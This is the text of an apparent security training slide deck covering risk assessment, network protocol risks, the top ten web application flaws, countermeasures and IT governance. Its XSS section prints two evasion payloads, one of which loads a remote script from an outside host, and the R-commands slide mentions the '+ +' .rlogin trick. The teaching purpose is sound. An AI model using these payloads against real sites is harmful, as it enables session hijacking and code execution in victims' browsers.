Information Security-Base Concepts & Leadership

Jeromie Jackson- CISSP, CISMCOBIT & ITIL Certifiedjeromie.jackson@tig.comjeromie@comsecinc.com619-368-7353

Brief Bio.

President- San Diego OWASP Vice President- San Diego ISACA CISSP Since 1996 CISM, COBIT, & ITIL Certified SANS Mentor Security Solutions Architect @ TIG

Articles* Covered on Forbes Magazine* Credit Union Business Magazine* Credit Union Magazine* CU Times* Insurance & Technology Review* CMP Media* Storage Inc.

Speaking Events* SPC 2009* SecureIT 2008* SecureIT 2009* Interop* Government Technology Conference (GTC)* Many Credit Union Leagues

Agenda

IT Audit is not Enough Network Security Web Application Security Countermeasures Ignorance is Risk Managing by Measurement

IT Assessment

IT Audit is not enough

Unclear Scope New Vulnerabilities/Risks Use of Lagging Indicators

Common IT Audit Deficiencies

Third-Party agreements and contracts weak

Employee Awareness Training needed improvement

Too many privileged accounts

Inability to document user privileges

Log collection weak

Critical assets not clearly defined & documented

DR/BCP not regularly tested

Internal controls not routinely reviewed

Change management documentation & consistency lacking

ERP systems riddled with segregation issues

- Paul Proctor and Gartner Risk & Compliance Research Community, March 2007

Human Stupidity

Changing configurations Installing rogue programs Human Error (audits)

Incorrect User Provisioning

− Automation tools generally too costly for SMB− “AD-Aware” tools often can authenticate but cannot

provision access control− User-Errors− Asset Owners

Often do not know what to provision Do not know granularity capabilities Generally rely on what has worked previously

“Is-Like”

If using Microsoft “Is-Like” make the account generic

Conduct anIT Risk Assessment

Critical Assets

Critical assets provide services to enable the business

May be external facing May be a single machine or set of machines

Risk Management Frameworks & Functions

Frameworks− NIST (SP800-30)− Octave− Octave Allegro− Factor Analysis for Information Risk (FAIR)

Primary Functions Create Value

Integral Organizational Process ContinualSystematic Focused on Continual Improvement

Account for People, Process, and Technology

Octave Allegro

Great for a small group Smaller in scope than other options Can be conducted in waves (IE: IT/Business,

etc.)

Containers

Describe where the information resides May be a single system May be a group of systems Does not have to be electronic

Threats

Describe the actors upon which vulnerabilities are executed causing risk to the organization

Threat Trees

Vulnerabilities

Issues which cause a system or process to deliver undesirable results

May impact− Confidentiality− Integrity− Availability

Risks

The result of a threat agent acting upon a vulnerability

Vulnerability Exploitation− Compromise of sensitive

data− Manipulation of

funds/account data− Denial of Service against

Internet-Facing Systems

Deliverables

Identification of Critical Assets

Ranking of Assets Portfolio view of

organizational risks

Network Security

TCP/IP

Transport Control Protocol / Internet Protocol Internet is based on TCP/IP Designed for unstable networks IPV4 prominent with IPV6 growing TCP, UDP, & ICMP are the primary types of

packets

TCP

Connection-Oriented Used when integrity or state is necessary Maintains state 3-way handshake to initiate session Significant overhead compared to UDP

TCP/IP/Packet

Telnet

Command-Line interface to operating system Commonly used for

− Networking equipment− UNIX systems

SSH should be used instead

SSH

Encrypted version of Telnet Enables remote management through CLI Preferred method of remote management

Should be used instead of Telnet

HTTP

Hyper Text Transfer Protocol Pieces of page come across

as unique TCP connections (images, text, etc.)

Ok to be used across network segments

− External to DMZ

HTTPS

Secure HTTP Encrypted with Secure Socket Layer (SSL)or

Transport Layer Security SSL inherently flawed based on use of MD5 for

hashing Application data is now an encrypted payload May conduct server, and client, authentication Ok to be used across network boundaries

− External to DMZ

SMTP

Simple Mail Transfer Protocol Over port 25 Used for outbound mail Notorious for security vulnerabilities

Ok to be exposed from Internet to DMZ

SMTP Relaying

Allows someone from one domain to relay information through another SMTP Server

A SMTP server should only allow outbound email from the domains it serves

EXPN/VRFY

EXPN- Expand Address− This attempts to expand the list of email addresses

from a mailing list.

VRFY- Verify Address− Attempts to validate email addresses− Many systems will/should provide a generic

response

POP

POP- Post Office Protocol Port 110 Used to receive emails Can use Apop which uses strong authentication

APOP or IMAP are preferred methods

Server Message Block (SMB)

This is the protocol associated with Microsoft file-sharing, and network printer, and serial ports (IE: for network-based modems)

Due to the complexity and bulkiness of this protocol it is recommend to not allow across bondaries whenever possible

This should not be allowed on any Internet connections

Remote Desktop Protocol (RDP)

“Windows Terminal Services” Not recommended to use on the Internet Instead use;

− VPN− Citrix− HTTPS− VMWare

R-Commands

Rsh- Remote Shell Rlogin- Remote Login Rcp- Remote Copy

− Etc. R-Commands allow users to define access

control rights− Exploited with “+ +” in .rlogin ,etc.

R-Commands should not be used- SSH, etc. instead

IP Security (IPSEC)

Used for VPNs Can run in two modes

− Tunnel- TCP/IP header encrypted and a new src/dst pair is added to the connection

− Transport- only payload is encrypted

Tunnel Vs. Transport

Voice Over IP (VOIP)

Allows for phone conversations across IP networks

Many security risks− Sniffing− MAC Spoofing− Application Vulnerabilities− Session Hijacking

File Transfer Protocol (FTP)

Preferable protocol used to transfer files May be used cross-boundaries into a DMZ Historically many vulnerabilities

− I often find exposure here

Trivial File Transfer Protocol (TFTP)

Similar to FTP but less interactive Not used very often Can be used inbound into a DMZ

UDP Pros and Cons

Connection-Less protocol No error correction or retransmission Doesn't require sequence # or handshake

− MUCH easier to spoof Only 1 way communication No sequencing No 3-way handshake

Domain Name System (DNS)

Used to resolve IP's to hostnames and vs. versa

− 72.167.183.41 = jeromiejackson.com− jeromiejackson.com = 72.167.183.41

Single queries use UDP port 53

DNS Zone Transfers

Zone transfers provide a copy of the name table that is stored by the DNS server

Zone Transfers occur over TCP 53 Zone Transfers should only be available to

upstream providers/peers

DNS Caching

When a client requests something to be resolved it will accept more information than what it had inquired about

DNS Redirection & Spoofing− Attacker spoofs reply with bogus data− Attacker replies with correct data & corrupt data− Attacker compromises DNS Server & uses it to

distribute additional bogus answers to queries

Simple Network Management Protocol (SNMP)

Can provide vast amounts of data about systems

Based on Management Information Base (MIB)s

V3 is the only one with built in authentication, privacy, and access control

Internet Control Message Protocol (ICMP)

Use for various tasks Ping (Echo Request/Reply) Host Not Reachable Network Unreachable Redirects Only allow across borders if required

Hijacking TCP Hijacking

− Man-In-The-Middle− TCP Reset− MAC Spoofing

UDP− Race condition- Respond prior to legit request

ICMP− ICMP Redirect through an infected

machine/network

BREAK- NextWeb Application Security

Web-App OverviewCross-Site Scripting

Injection FlawsMalicious File

Insecure Direct Object ReferenceCross-Site Request Forgery

Information Leakage & Error HandlingBroken Authentication & Session Management

Insecure Cryptographic StorageInsecure Communications

Failure to Restrict URL Access

Tools Being Used

WebScarab− Allows for HTML massaging− Transcoder

Firefox Developer Tools− Form Editing− Subvert client-side security settings

1- Cross-Site Scripting (XSS)

XSS flaws occur whenever an application takes user supplied data and sends it to a web browser without first validating or encoding the content.

XSS allows attackers to execute script in the victim's browser

Worry About Encodings Original URL: www.comsecinc.com/contact.php

Base64

− d3d3LmNvbXNlY2luYy5jb20vY29udGFjdC5waHA=

URLEncoding

− www.comsecinc.com%2Fcontact.php

Derivatives to further obscure intent

− Spaces or content breaks within content

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>

Vulnerability

Hijack user sessions Redirect to hostile location Website Defacement Possibly introduce worms

Protection

Utilize a standard input validation mechanism Do not attempt black-list validation Java- Use Struts <bean: write> .NET- Use Microsoft Anti-XSS Library PHP- Use htmlentities() or htmlspecialchars()

References

Rsnake put together a great XSS Cheat Sheet− http://ha.ckers.org/xss.html

How to Obscure Any URL− http://www.pc-help.org/obscure.htm

2- Injection Flaws User-Supplied data sent to an interpreter

− SQL− LDAP− Xpath− XML, − SOAP− OS command injection

Vulnerability SQL Injection

− Create, Modify,Delete,View tables/databases OS Command Injection

− Read/Modify/Delete/Create files− Execute Processes with Privileges of application.

Protection

Sanitize Input Enforce least-privilege-especially in the

database Avoid detailed error messages Use strongly typed parameterized queries

3- Malicious File Execution

Applications using data input for filename usage are generally vulnerable

Vulnerability

Hostile File Uploads Access to Sensitive Data Reading confidential data

Protection Use a “Known Good” strategy Sanitize User Input PHP

− Disable allow_url_fopen and allow_url_include− Disable Register Globals & E_Restrict

Java- Ensure Security Manager is enabled for is properly configured

.NET- Leverage least privilege via Security manager

4- Insecure Direct Object Reference

A user's direct access to object references− IE: Filenames, & directories

Vulnerability

Hostile File Uploads Access to Sensitive Data Reading confidential data

Protection

Avoid exposing private object references Indirectly reference objects

− Index files as opposed to utilizing their name

5- Cross-Site Request Forgery

A CSRF attack forces a logged-on victim’s browser to send a request to a vulnerable web application, which then performs the chosen action on behalf of the victim.

IE: Vulnerable Banking relationship, shopping site, etc.

Vulnerability

Can exploit the vulnerability on behalf of the attacker.

Submit bank transfer Send credit card information Automatically post information out to an Internet

site

Protection Re-Authenticate or use transaction signing to ensure that the request is

genuine.

Set up external mechanisms such as e-mail or phone contact in order to verify requests or notify the user of the request.

Do not use GET requests (URLs) for sensitive data or to perform value transactions.

Use only POST methods when processing sensitive data from the user.

POST alone is insufficient protection. You must also combine it with random tokens, out of band authentication, or re-authentication to properly protect against CSRF

For ASP.NET, set ViewStateUserKey

− Provides a similar type of check to a random token as described above.

Vulnerability

Data in errors may be useful for social engineering

May disclose internal object references Often discloses account names

Protection

Disable or limit error handling A common error handler is often useful

− Can send details out-of-band Ensure development team shares a unified

approach

7- Broken Authentication & Session Management

Allows attacker to bypass the I&A Process Often introduced through ancillary

authentication functions− Logout, password management, timeout, remember

me, secret question, and account update.

Vulnerability

Subversion of authentication within the application

Portions of application go unauthenticated

Protection Only use the inbuilt session management mechanism.

Limit or rid your code of custom cookies for authentication or session management

Use a single authentication mechanism

Do not allow the login process to start from an unencrypted page.

Use a timeout period

Check the old password when the user changes to a new password

8- Insecure Cryptographic Storage Protecting sensitive data with cryptography has

become a key part of most web applications. Simply failing to encrypt sensitive data is very

widespread.

Vulnerability

Inappropriate information disclosure Regulatory violation

Protection Do not create cryptographic algorithms. Do not use weak algorithms, such as MD5 /

SHA1. − Favor safer alternatives, such as SHA-256 or better.

Generate keys offline and store private keys with extreme care.

Ensure that encrypted data stored on disk is not easy to decrypt.

9- Insecure Communications Applications frequently fail to encrypt network

traffic when it is necessary to protect sensitive communications.

Encryption (usually SSL) must be used for all authenticated connections.

In addition, encryption should be used whenever sensitive data is transmitted.

Vulnerability Inappropriate access to conversations

− Any credentials or sensitive information transmitted.

Protection Use SSL for all connections that are

authenticated or transmitting sensitive or value data

Ensure that communications between infrastructure elements are appropriately protected.

Under PCI Data Security Standard requirement 4, you must protect cardholder data in transit.

10- Failure to Restrict URL Access

Frequently, the only protection for a URL is that links to that page are not presented to unauthorized users

Security by obscurity is not sufficient to protect sensitive functions.

Vulnerability

"Hidden" or "special" URLs, rendered to all users if they know it exists

− /admin/adduser.php or /approveTransfer.do. Applications often allow access to "hidden"

files, such as static XML or system generated reports.

Protection

Ensure the access control matrix is part of the business, architecture, and design of the application

Perform a penetration test Do not assume that users will be unaware of

special or hidden URLs or APIs. Block access to all file types that your

application should never serve.

Action Plan

Embed security early in projects Utilize standard data validation processes Implement a standardized error handler Properly segment the environment(s) Test all externally-facing applications

Implement Security in Projects

The earlier security is implemented the lower the cost of the project

− Inception- Ensure plans meet security standards− Development- Ensure it stays on track− Implementation- Validate implemented

appropriately− Operations- Monitor & Measure− Disposal- Ensure proper asset disposal processes

Implement Standardized Processes for Data Validation

Implement standard error handling processes to limit data exposure

Utilize standardized santization processes to ensure consist quality protection

Properly Segment the Environments Three-Tier DMZ

Test All External-Facing Applications

Application test all applications accessible on the Internet

Assess all system which utilize restricted data− (Healthcare, Credit Cards, ACH Transfers, etc.)

Strength in Numbers

Join Local Associations− OWASP & ISACA

ComSec ServicesQualificationsOWASP SD Chapter President CISSP & CISM PractitionersBoard Members to ISACA ITIL & COBIT CertifiedNSS Labs Advisory Board 800+ Regulated Customers

Security ServicesVirtual CISO Social EngineeringRisk Assessment Awareness TrainingSecurity Assessment Policy Development

Contact Information

Jeromie Jackson- CISSP/CISM

jeromie@comsecinc.com

ComSec, Inc.

702-866-9412

Part 3Technical Countermeasures

Firewalls

IP Filtering− (Src, port, dst, port, flags)− IP ACLs

Stateful Inspection− Just like IP Filtering but maintains state− Identifies existing flows and uses for rule base

Application-Level− Understands the application− IE: Can do FTP PUT, but not GET− Mitigates least-privilege

Intrusion Detection/Prevention (IDS/IPS)

Can be signature or anomaly based Signature

− Floods− Brute Force− SQL Injection

Anomaly− Keystrokes & typing− Standard system usage− Obscure destinations or services being utilized

Web Application Firewall (WAF)

Monitors and mitigates web-based vulnerabilities

Some IDS/IPS Signatures may see Some provide application profiling

− Imperva− Breach− Data Power

Antivirus/ Anti-Malware

Mostly signature based− Identified files/processes

Whitelisting becoming more prevalent Should be deployed @ the desktop & at the

gateway Preferably two different engines/vendors

Content Filtering

Blocking sites and/or frames in a site Can be white-list or black-list based Sometimes used for anticipated productivity

gains

Authentication

3 factors of authentication− Something you know

PIN Password

− Something you have Smart Card RFID Card Digital Certificate

− Something you are Biometrics

Log Management

Logs are critical importance to auditors− Centralized− Monitored− Escalated− Consistent− Secure

SIMs are a great way to correlate these

Access Control

Role-Based User-Based

Permissions (MAC & DAC)

Discretionary Access Control User's discretion

− Found on most multi-user operating systems− (Read, Write, Execute / User, Group, Other)

Mandatory Access Control

- Objects are given labels− Labels often hard-coded− Specific access control provisions used (IE: Read

down, write equal)

User Provisioning

Often resource intensive Prone to error Provisioning software generally not cost-

effective for SMB space

Maximize the applications that are AD aware, and hopefully can leverage groups for access control

Symmetric Encryption

Asymmetric Encryption

Disk Encryption

Should be deployed on all remote devices Full-Disk is preferable Mitigates the significant threats of a device

being lost/stolen

Email Encryption

Email goes over unencrypted ports Some tools require end-user to encrypt

outbound Some can have policies based on destination Can be Symmetric or Asymmetric

SIM/SIEM

Great way to reduce cost of security Consolidate those logs- make them useful! Pivoting is very functional (BI for Security)

− Trigeo− Arcsight− NetIQ

Database Auditing

Some built-in− Be careful of turning auditing on without tuning

Imperva has a Database play Don't let developers directly connect to the SQL

port(s)

Data Loss Prevention (DLP)

Great way to gain visibility into previously unidentified risk vectors

− Remember Due Diligence & Due Care Some can import databases Some are agent based

− This is good for mobile computing!

Physical Countermeasures

Information Security != Technical Security Many attacks/breaches due to physical security

weaknesses

ID Cards

Various Type− RFID Cards− Smart Cards− MAG Stripes

RFID Pros/Cons

Pros− Easy− Cost Efficient− Lots of vendors

Cons− Cloning

Smart Cards Pros/Cons

Pros− Intelligent− Built-in CPU

Cons− More expensive− Complexity generally adds risk

Mag Stripes

Pros− Cheaper cards− Cheaper Readers

Cons− Exploitation costs lower

Administrative Controls

Policies, Procedures, and Standards mitigate end-user risk

Do not fall under the panacea that technology comprehensively mitigates risk

Policies

Describe management expectations Describe what is to be done Should be aligned with high-level control

objectives/intentions

Procedures

Describe the actions required to carry out policies

Describe the How to execute the policies

Standards

Describe high-level objectives for IT− Consolidate types of technology in the environment− Ensure implementation of security principals

A Guidebook for architects A Summary of what the stakeholders described

Dual Control

Two-Pieces of a key to open a door Two people to execute a transaction Additional signatures for processing

Audit

Policies, procedures, and standards not beneficial if not in use

Logs are required by auditors to ensure controls are consistently being implemented

Primary Concepts− Least Privilege− Segregation of Duty− Dual-Control− Continual− Repeatable

Least Privilege

Users should be given access only to resources necessary to carry out their job

Mitigates inappropriate disclosures Enhances auditability Should be used to help stakeholders define

access control requirements for an asset

OS Hardening Least privilege

− Only required services allowed− Remove unnecessary services

Patching− Mitigate vulnerability affecting the environment

Consistency− Reduce Complexity− Limit types of vulnerabilities affecting the

environment− Minimize vulnerabilities present in the environment− Stabilize a baseline

Racking & Stacking @ a 3rd Party

How far up will they manage?− Up to the rack?

OS & App threats Ability to install countermeasures

− Up to the OS? Can you deploy OS/Network Countermeasures? Patching strategies What about non-Microsoft Applications?

− Up to the app? Auditability Least-Privilege

Virtualization Threats & Risks

Virtual Host to Virtual host connections− Network-Based countermeasures

Hypervisor security− Mainframe− Process Sockets

Ignorance is Risk

Manage by Measurement Through the Use of a Control

Framework

Security Risks & Exposures are Growing

More than 35 million data records were breached in 2008 in the United States -Theft Resource Center

Jan 20, 2009- Heartland Payment Systems- 100 Million Transactions Per Month! http://www.2008breach.com/

252,276,206 records with personal information since January 1995 - www.privacyrights.org

Risk is a Business Issue

“Ignoring or misunderstanding financial risks played a substantial role in creating the world financial crisis in 2008.”

“Organizations need to assess risk as part of cost-cutting decisions and should manage increased IT risks to prevent operation failures that will lead to further loss.”

- Gartner, “Managing IT Risks During Cost-Cutting Periods”, October 22, 2008

Risk is a Business Issue (Cont.)− CardSystems Solutions Inc.

Mid 2005 breach of 40 million credit cards.

Visa & Mastercard terminated their processing capability- they soon went under

35+ million data records were breached in 2008 in the United States-Theft Resource Center

− Heartland Payment Systems

Jan 20, 2009

100 Million Transactions Per Month

http://www.2008breach.com

− 252,276,206 records with personal information since January 1995 -http://www.privacyrights.org

Risk Aware Risk Adverse

Risk Adverse Avoids Discussions of Risk

Avoids Responsibility for risks

No tracking or Analysis of Features & Successes

Can't Learn From Mistakes; High Repeat Failure Rates

Padded Budgets, Extended Time Lines, Surprise Overruns

Managers Assign Blame, Don't Share the Risk

Risk Aware Vs. Risk Adverse

Risk Aware OK to Talk About Risk

Ok to Take Risks

Ok to Fail (if managing appropriately)

Success and failures tracked and analyzed

Continuous learning and improvement for key processes

Realistic budgets and time lines that are continuously monitored

Enterprise is able to take on bigger risks

2007 MIT Sloan Center for Information Systems Research & Gartner Inc.

Being Risk Aware Enables Agility & InnovationBeing Risk Aware Enables Agility & Innovation

Down Economy causing executives to focus on profitability

3 ways to improve profitability

− Increase top-line sales− Reduce COGS− Optimize Operations

Optimize IT− Bridge the gap between control

requirements, technical issues, and business risk

− Use a portfolio approach to risk management

− Manage by measurement− Enable your organization to reap

maximum benefit from technology investments

Regulation With Minimal Benefit

Redundant Requirements

Controls without clear benefits

Overlapping and vague requirements

Costly resource allocation

Regulations

Increasing complexity Resource intensive Divert focus on maturing risk management

Regulatory Convergence

Optimize Remediation

Assert Compliance Simultaneously

IT & Business Alignment- Are we communicating?

Agile Competitive Advantage

Prudent

Implications

IT is meant to serve the business

IT must be aligned with business goals

IT is costly and requires prudent management

Become Proactive

Instill best-practice governance Utilize a risk-management portfolio to guide

remediation Consolidate Regulations

Managing by Measurement

Leading the Trauma Unit

Governance- “Specifying the decision rights and accountability framework to encourage desirable behavior in using IT.”

- Peter Weill and Jeanne Ross, IT Governance: How Top Performers Manage IT Decisions Rights for Superior Results (Boston: Harvard Business School Press, 2004)

The Root-Cause of IT Risk -

Lack of Governance

50 Case Studies130 Firms Surveyed2000+ Executives Refined

George Westerman & Richard Hunter, IT Risk; Turing Business Threats Into Competitive Advantage (Harvard Business School Press, 2007)

“..Manifested as uncontrolled complexity, and inattention to risk.”

5 Facets of Governance

Value Delivery Strategic Alignment Performance Measurement Resource Management Risk Management

Improve Risk Management

Risk Management Process

− Identify critical assets− Define containers− Identify risks & threats− Quantify or qualify risks

Prioritize Remediation Efforts

Stop The Bleeding - Cauterize the Wounds

Identify & Collect Known Risks Create a Remediation Portfolio Document the “As-Is” State

Stabilize the Patient Classify Known Risks

External Audits

Internal Audits

Regulatory Audits

Vulnerability Assessments

Risk Assessments

Address Availability Focus on Business Consequence

Consolidate Regulations

Identify Primary ControlsConfidentialityConfidentiality Integrity

AvailabilityAvailability AuditabilityAvailability Performance Measurement

Have a clear architectural direction / “To-Be” state

Conduct an IT Assessment to identify “As-Is” State

Through planning identify core strategies and architecture

Manage by Measurement

Seek Optimal Treatment Plan

Benefits of utilizing best practices

− Enables external expertise

− Facilitates benchmarking

− Auditor familiarity resulting in reduced costs

Best Practice Control Objectives

Components of Controls

Defines a specific goal Aligns with business objectives Describes the focus required to manage Summarizes how the goal will be achieved Defines potential KPIs/KGIs RACI Table

Communicate & Collaborate

Paradigms- 7 Habits of Highly Effective People- “A man on a subway sees 2 obnoxious children...”

The sum is greater than the individual pieces

Balanced Scorecards

Focus on 4 key paradigms− Financial- Fiscal Measurements− Customer- Service Qualities− Operations- Operational Efficiency & Agility− Learning & Growth- Fostering Growth & Innovation

Provides measurements based on key “customers” being serviced

Balanced Scorecards

Strategy MapsDescribe the “To-Be” state graphically

Facilitate collaboration Minimize jargon

Collaborate

Strategy Map

Leading & Lagging Indicators

Leading indicators− Sales Targets− # of site visitors expected this year

Lagging indicators− $ Closed Deals last month− Visitors last year− Amount a specific product has generated thus far

KPIs & KGIs

A Key Goal Indicator, representing the process goal, is a measure of "what" has to be accomplished. It is a measurable indicator of the process achieving its goals, often defined as a target to achieve.

− Remain Profitable

− Take over 15% market share in a territory

By comparison, a Key Performance Indicator is a measure of "how well" the process is performing.

− % of Bench time for engineers - “Riding the Pine”

− # of opportunities in the pipeline

Prudent Management is not just for the enterprise anymore

Governance has been slowly adopted in the SMB space

− Perceived as an “enterprise play”− ROI/CBA/NPV communication muddled with jargon

Talk to your audience- don't belabor acronyms and frameworks.

Focus on sound stewardship principals.

References

Privacy Violations- www.privacyrights.org COBIT - www.isaca.org/cobit VAL IT - www.isaca.org/valit Strategy Maps -

http://www.valuebasedmanagement.net/methods_strategy_maps_strategic_communication.html

BSC - http://www.balancedscorecard.org/ Lean Six-Sigma - www.qimacros.com Harvard Business Review

Jeromie Jackson- CISSP, CISM Jeromie.Jackson@TIG.COM

619-368-7353-directwww.linkedin.com/in/securityassessment

Questions?